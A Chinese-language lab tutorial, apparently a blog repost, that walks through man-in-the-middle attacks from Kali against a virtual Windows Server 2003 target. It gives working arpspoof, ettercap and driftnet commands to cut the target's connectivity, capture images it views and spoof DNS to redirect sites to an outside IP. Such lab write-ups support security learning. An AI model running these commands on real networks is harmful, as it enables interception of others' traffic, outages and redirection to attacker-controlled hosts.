kali攻击命令大全_中间人攻击之ARP欺骗
我不会RAP,但我会ARP——老欢
环境:
- 攻击机:kali linux (ip地址:192.168.204.128)
- 靶机:windows server 2003(IP地址:192.168.204.132)
以上均是虚拟机环境,网络模式为NAT模式
检验虚拟机之间的网络是否连通
ARP断网攻击
在终端输入命令:arpspoof -i eth0 -t 192.168.204.132 192.168.204.2
命令解释:
-i 指定网卡
-t 指定目标ip
这里的192.168.204.2是网关
欺骗开始,我们来看看靶机,靶机已经无法上网,无法访问百度了。
接下来我们按ctrl+c停止arp欺骗,靶机又能上网了
2.捕获靶机浏览的图片
在终端输入命令:ettercap -i eth0 -Tq -M arp:remote /192.168.204.132// /192.168.204.2//
eth0是网卡
192.168.204.132是靶机地址
192.168.204.2是网关地址
开启图片嗅探 driftnet -i eth0 -a -d /root/pictures
这里将嗅探到的图片存到root目录下的pictures文件夹里
接下来我们在靶机上面随便浏览一些图片,然后我们打开kali机的pictures文件夹,所有的图片已经被抓取到,所以少看不该看的图片!
3.DNS欺骗
首先执行命令leafpad /etc/ettercap/etter.dns
在这个文件里加上这么一句 *.*.com A 39.108.146.75(这里的ip地址是403工作室的ip)
执行命令 ettercap -i eth0 -Tq -P dns_spoof /192.168.204.132// /192.168.204.2//
回到靶机,在url上输人http://www.163.com来访问一下网易
当我回车访问那一刻,它跳转到了403工作室
经过试验,这里的dns欺骗对一些大型网站不起作用,可能是做了防dns欺骗的措施
本文仅供测试娱乐,请勿用于实际环境。
中间人攻击之ARP欺骗 - 403工作室laohuan.art
AtomGit 是由开放原子开源基金会联合 CSDN 等生态伙伴共同推出的新一代开源与人工智能协作平台。平台坚持“开放、中立、公益”的理念,把代码托管、模型共享、数据集托管、智能体开发体验和算力服务整合在一起,为开发者提供从开发、训练到部署的一站式体验。
更多推荐



所有评论(0)